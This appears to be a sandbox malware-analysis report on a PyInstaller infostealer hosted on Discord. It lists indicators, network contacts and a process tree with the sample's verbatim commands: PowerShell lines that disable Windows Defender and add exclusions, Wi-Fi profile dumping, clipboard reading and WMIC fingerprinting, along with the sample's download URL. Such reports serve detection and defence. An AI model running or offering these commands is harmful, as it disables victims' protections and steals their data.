Analysis

max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/05/2024, 23:37

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1

Sample: https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
Resource: win10v2004-20240426-en

General

Target: https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 9 IoCs)
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
1056  powershell.exe
5056  powershell.exe
5024  powershell.exe
5164  powershell.exe
5480  powershell.exe
3028  powershell.exe
5368  powershell.exe
1548  powershell.exe
4804  powershell.exe

Downloads MZ/PE file

Drops startup file (6 IoCs)
description   ioc                                                                                                               Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe                    notaloggertrustmebro.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA  notaloggertrustmebro.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe                    notaloggertrustmebro.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA  notaloggertrustmebro.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe                    notaloggertrustmebro.exe
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notaloggertrustmebro.exe\:SmartScreen:$DATA  notaloggertrustmebro.exe

Executes dropped EXE (6 IoCs)
pid   Process
5508  notaloggertrustmebro.exe
5956  notaloggertrustmebro.exe
3564  notaloggertrustmebro.exe
376   notaloggertrustmebro.exe
3708  notaloggertrustmebro.exe
1064  notaloggertrustmebro.exe
Loads dropped DLL (64 IoCs)
pid   Process
5956  notaloggertrustmebro.exe (repeated entries, one per load)
376   notaloggertrustmebro.exe (repeated entries, one per load)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource yara_rule behavioral1/files/0x00070000000234d2-181.dat upx behavioral1/memory/5956-184-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp upx behavioral1/memory/5956-194-0x00007FFEE9660000-0x00007FFEE966F000-memory.dmp upx behavioral1/files/0x00070000000234d0-203.dat upx behavioral1/files/0x00070000000234ac-211.dat upx behavioral1/files/0x00070000000234ab-210.dat upx behavioral1/memory/5956-222-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp upx behavioral1/files/0x00070000000234d5-225.dat upx behavioral1/files/0x00070000000234b0-227.dat upx behavioral1/files/0x00070000000234cb-231.dat upx behavioral1/memory/5956-233-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp upx behavioral1/memory/5956-238-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp upx behavioral1/memory/5956-237-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp upx behavioral1/memory/5956-236-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp upx behavioral1/memory/5956-243-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp upx behavioral1/files/0x00070000000234b2-247.dat upx behavioral1/memory/5956-249-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp upx behavioral1/memory/5956-250-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp upx behavioral1/memory/5956-254-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp upx behavioral1/memory/5956-257-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp upx behavioral1/memory/5956-262-0x00007FFED8670000-0x00007FFED867B000-memory.dmp upx behavioral1/memory/5956-268-0x00007FFED72A0000-0x00007FFED72AE000-memory.dmp upx behavioral1/memory/5956-280-0x00007FFED62F0000-0x00007FFED62FC000-memory.dmp upx behavioral1/memory/5956-281-0x00007FFED60A0000-0x00007FFED62E5000-memory.dmp upx behavioral1/memory/5956-279-0x00007FFED6300000-0x00007FFED6312000-memory.dmp upx behavioral1/memory/5956-282-0x00007FFED6060000-0x00007FFED6089000-memory.dmp upx behavioral1/memory/5956-283-0x00007FFED6030000-0x00007FFED605E000-memory.dmp upx 
behavioral1/memory/5956-278-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp upx behavioral1/memory/5956-277-0x00007FFED6320000-0x00007FFED632D000-memory.dmp upx behavioral1/memory/5956-276-0x00007FFED6330000-0x00007FFED633C000-memory.dmp upx behavioral1/memory/5956-275-0x00007FFED6340000-0x00007FFED634C000-memory.dmp upx behavioral1/memory/5956-274-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp upx behavioral1/memory/5956-269-0x00007FFED7290000-0x00007FFED729C000-memory.dmp upx behavioral1/memory/5956-273-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp upx behavioral1/memory/5956-272-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp upx behavioral1/memory/5956-271-0x00007FFED7270000-0x00007FFED727B000-memory.dmp upx behavioral1/memory/5956-270-0x00007FFED7280000-0x00007FFED728B000-memory.dmp upx behavioral1/memory/5956-267-0x00007FFED72B0000-0x00007FFED72BC000-memory.dmp upx behavioral1/memory/5956-266-0x00007FFED72C0000-0x00007FFED72CC000-memory.dmp upx behavioral1/memory/5956-265-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp upx behavioral1/memory/5956-264-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp upx behavioral1/memory/5956-263-0x00007FFED80D0000-0x00007FFED80DC000-memory.dmp upx behavioral1/memory/5956-261-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp upx behavioral1/memory/5956-260-0x00007FFED93F0000-0x00007FFED93FC000-memory.dmp upx behavioral1/memory/5956-259-0x00007FFED9530000-0x00007FFED953B000-memory.dmp upx behavioral1/memory/5956-258-0x00007FFEE0E30000-0x00007FFEE0E3B000-memory.dmp upx behavioral1/memory/5956-256-0x00007FFED6350000-0x00007FFED646B000-memory.dmp upx behavioral1/memory/5956-255-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp upx behavioral1/memory/5956-253-0x00007FFEE36E0000-0x00007FFEE36EB000-memory.dmp upx behavioral1/memory/5956-252-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp upx behavioral1/memory/5956-251-0x00007FFED7300000-0x00007FFED7387000-memory.dmp upx 
behavioral1/memory/5956-248-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp upx behavioral1/memory/5956-246-0x00007FFED80E0000-0x00007FFED8115000-memory.dmp upx behavioral1/memory/5956-245-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp upx behavioral1/memory/5956-242-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp upx behavioral1/memory/5956-241-0x00007FFED8C20000-0x00007FFED8C36000-memory.dmp upx behavioral1/files/0x00070000000234af-240.dat upx behavioral1/files/0x00070000000234a7-239.dat upx behavioral1/files/0x00070000000234cd-235.dat upx behavioral1/files/0x00070000000234b3-234.dat upx behavioral1/memory/5956-232-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp upx behavioral1/memory/5956-230-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp upx behavioral1/memory/5956-228-0x00007FFEE5CB0000-0x00007FFEE5CBD000-memory.dmp upx behavioral1/memory/5956-226-0x00007FFEE6770000-0x00007FFEE677D000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 14 IoCs)
flow  ioc
87    discord.com
105   discord.com
65    raw.githubusercontent.com
67    discord.com
68    discord.com
71    discord.com
72    discord.com
86    discord.com
89    raw.githubusercontent.com
103   discord.com
106   discord.com
64    raw.githubusercontent.com
79    raw.githubusercontent.com
84    discord.com

Looks up external IP address via web service (7 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
104   api.ipify.org
61    api.ipify.org
62    api.ipify.org
70    api.ipify.org
77    api.ipify.org
85    api.ipify.org
88    api.ipify.org

Detects Pyinstaller (1 IoCs)
resource                                  yara_rule
behavioral1/files/0x000a000000023418-41.dat  pyinstaller

Detects videocard installed (1 TTPs, 3 IoCs)
Uses WMIC.exe to determine the installed video card.
pid   Process
2932  WMIC.exe
6040  WMIC.exe
1648  WMIC.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
description        ioc                                                                   Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe

NTFS ADS (1 IoCs)
description                   ioc                                                        Process
File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 904369.crdownload:SmartScreen  msedge.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid   Process  (entries in order of appearance, consecutive repeats collapsed)
3952  msedge.exe (x2)
3988  msedge.exe (x2)
3244  identity_helper.exe (x2)
2732  msedge.exe (x2)
5956  notaloggertrustmebro.exe (x12)
5748  powershell.exe (x3)
5956  notaloggertrustmebro.exe (x6)
6036  powershell.exe (x3)
1056  powershell.exe (x3)
5056  powershell.exe (x3)
5368  powershell.exe (x3)
376   notaloggertrustmebro.exe (x12)
5644  powershell.exe (x3)
376   notaloggertrustmebro.exe (x4)
2300  powershell.exe (x3)
5024  powershell.exe (x1)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
pid   Process
3988  msedge.exe (x7)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description (Token)  pid   Process
SeDebugPrivilege     5956  notaloggertrustmebro.exe
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36  5416  WMIC.exe (this full set of 21 tokens is listed twice)
SeDebugPrivilege     5748  powershell.exe
SeDebugPrivilege     6036  powershell.exe
SeDebugPrivilege     1056  powershell.exe
SeDebugPrivilege     5056  powershell.exe
SeDebugPrivilege     5368  powershell.exe
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege  2188  WMIC.exe (the 64-entry list ends here)

Suspicious use of FindShellTrayWindow (38 IoCs)
pid   Process
3988  msedge.exe (x38)

Suspicious use of SendNotifyMessage (24 IoCs)
pid   Process
3988  msedge.exe (x24)

Suspicious use of WriteProcessMemory (64 IoCs)
description                       pid   Process     procid_target
PID 3988 wrote to memory of 1104  3988  msedge.exe  84  (repeated)
PID 3988 wrote to memory of 3060  3988  msedge.exe  85  (repeated; the bulk of the 64 entries)
PID 3988 wrote to memory of 3952  3988  msedge.exe  86  (repeated)
PID 3988 wrote to memory of 2640  3988  msedge.exe  87  (repeated)
Processes
(indentation shows the process tree level; each entry lists the image path, the command line and the signatures raised by that process)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 1, PID 3988]
  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1237910600949174314/1237910688165265408/notaloggertrustmebro.exe?ex=663d5dab&is=663c0c2b&hm=a504c550ad08bda5e8c4ee8e10454fc6da33d63ebfe478c1ead62c4a0c58df5b&
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 1104]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee9a746f8,0x7ffee9a74708,0x7ffee9a74718

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 3060]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 3952]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 2640]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 2228]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 3928]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  [level 2, PID 2664]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  [level 2, PID 3244]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4128 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 2312]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4672 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 4316]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 1676]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5948 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 2732]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 3176]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 4032]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 860]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  [level 2, PID 1468]
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,17168349484960838186,3209116302322580536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1

  C:\Users\Admin\Downloads\notaloggertrustmebro.exe  [level 2, PID 5508]
    cmd: "C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
    - Executes dropped EXE

    C:\Users\Admin\Downloads\notaloggertrustmebro.exe  [level 3, PID 5956]
      cmd: "C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
      - Drops startup file
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\cmd.exe  [level 4, PID 208]
        cmd: C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

        C:\Windows\System32\wbem\WMIC.exe  [level 5, PID 5416]
          cmd: C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\cmd.exe  [level 4, PID 2012]
        cmd: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

        C:\Windows\system32\netsh.exe  [level 5, PID 5656]
          cmd: netsh wlan show profiles

      C:\Windows\system32\cmd.exe  [level 4, PID 5692]
        cmd: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 5, PID 5748]
          cmd: powershell Get-Clipboard
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\cmd.exe  [level 4, PID 5916]
        cmd: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 5, PID 6036]
          cmd: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 5, PID 1056]
          cmd: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 5, PID 5056]
          cmd: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 5, PID 5368]
          cmd: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\cmd.exe  [level 4, PID 3080]
        cmd: C:\Windows\system32\cmd.exe /c "wmic os get Caption"

        C:\Windows\System32\Wbem\WMIC.exe  [level 5, PID 2188]
          cmd: wmic os get Caption
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\Wbem\wmic.exe  [level 4, PID 5632]
        cmd: wmic cpu get Name

      C:\Windows\system32\cmd.exe  [level 4, PID 2740]
        cmd: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

        C:\Windows\System32\Wbem\WMIC.exe  [level 5, PID 2932]
          cmd: wmic path win32_VideoController get name
          - Detects videocard installed

      C:\Windows\system32\cmd.exe  [level 4, PID 1656]
        cmd: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

        C:\Windows\System32\Wbem\WMIC.exe  [level 5, PID 5712]
          cmd: wmic computersystem get totalphysicalmemory

      C:\Windows\system32\cmd.exe  [level 4, PID 452]
        cmd: C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

        C:\Windows\System32\wbem\WMIC.exe  [level 5, PID 4180]
          cmd: C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

C:\Windows\System32\CompPkgSrv.exe  [level 1, PID 2020]
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe  [level 1, PID 796]
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe  [level 1, PID 5864]
  cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\notaloggertrustmebro.exe  [level 1, PID 3564]
  cmd: "C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
  - Executes dropped EXE

  C:\Users\Admin\Downloads\notaloggertrustmebro.exe  [level 2, PID 376]
    cmd: "C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe  [level 3, PID 3596]
      cmd: C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

      C:\Windows\System32\wbem\WMIC.exe  [level 4, PID 4368]
        cmd: C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

    C:\Windows\system32\cmd.exe  [level 3, PID 5952]
      cmd: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

      C:\Windows\system32\netsh.exe  [level 4, PID 4424]
        cmd: netsh wlan show profiles

    C:\Windows\system32\cmd.exe  [level 3, PID 5600]
      cmd: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 4, PID 5644]
        cmd: powershell Get-Clipboard
        - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe  [level 3, PID 4900]
      cmd: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5700
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:5672
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name3⤵PID:2012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4320
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:6040
-
-
-
